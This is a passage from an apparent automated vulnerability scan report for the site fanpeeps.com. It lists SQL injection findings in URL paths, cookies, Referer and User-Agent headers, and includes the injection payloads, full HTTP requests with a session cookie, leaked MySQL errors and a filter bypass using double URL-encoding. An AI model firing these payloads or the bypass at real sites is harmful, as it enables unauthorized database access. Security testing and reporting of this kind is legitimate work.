Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.44. http://fanpeeps.com/media/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media'%20and%201%3d1--%20/?pid= HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:47:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17916

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.45. http://fanpeeps.com/media/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17435

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.46. http://fanpeeps.com/media/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',0)waitfor%20delay'0%3a0%3a20'--
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17397

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.47. http://fanpeeps.com/media/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2'waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17953

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.48. http://fanpeeps.com/media/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17354

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527%2527; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 53253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.49. http://fanpeeps.com/media/ [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/?pid= HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17390

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.50. http://fanpeeps.com/media/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /media/?pid=&1'=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17397

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /media/?pid=&1''=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.51. http://fanpeeps.com/media/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload " was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/?1"=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18157

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.52. http://fanpeeps.com/media/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. The payload 19058072'%20or%201%3d1--%20 was submitted in the pid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/?pid=19058072'%20or%201%3d1--%20 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17272

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.53. http://fanpeeps.com/mlb [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /mlb

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload " was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /mlb" HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.54. http://fanpeeps.com/ncaa [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa',0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/?action=news&pid=19&iid=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17433

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.55. http://fanpeeps.com/ncaa2.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 14003792'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php14003792'%20or%201%3d1--%20 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:47:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18087

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.56. http://fanpeeps.com/ncaa2.php [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.57. http://fanpeeps.com/ncaa2.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17345

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
